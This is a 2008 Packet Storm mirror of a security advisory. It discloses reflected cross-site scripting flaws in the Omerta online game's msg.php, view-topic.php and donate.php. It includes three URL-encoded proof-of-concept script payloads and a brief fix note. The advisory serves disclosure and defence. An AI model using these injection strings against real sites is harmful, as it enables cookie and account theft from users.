omerta-xss.txt

2008-05-13T00:00:00
ID PACKETSTORM:66293
Type packetstorm
Reporter SmOk3
Modified 2008-05-13T00:00:00

Description

                                        
                                            `original advisory at http://www.davidsopas.com/soapbox/omerta_xss.txt  
  
XSS flaws in Omerta script (www.barafranca.com)  
version tested: 2.7c and 2.8(newer version)  
  
by David Sopas Ferreira  
<smok3f00 at gmail.com>  
<www.davidsopas.com>  
  
Found and reported at : 5-05-2008PT  
Full disclosure at : 12-05-2008PT  
  
  
?!---------------------------------------------------------  
XSS  
----!?  
  
On this online RPG, it's possible for a malicious user  
use XSS (Cross Site Scripting) attacks to steal users cookies  
and possibly their account.  
  
The files affected by this are:  
  
msg.php, unfiltred var=nick  
view-topic.php, unfiltred var=page  
donate.php, unfiltred var=nation  
  
Attack example here:  
  
msg.php?nick=ValidUser%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E  
forums/view-topic.php?id=3830&page=2%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E  
donate.php?nation=PT%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E  
  
  
?!---------------------------------------------------------  
How to fix it  
-------------!?  
  
Edit the source code to ensure that input is properly sanitised.  
`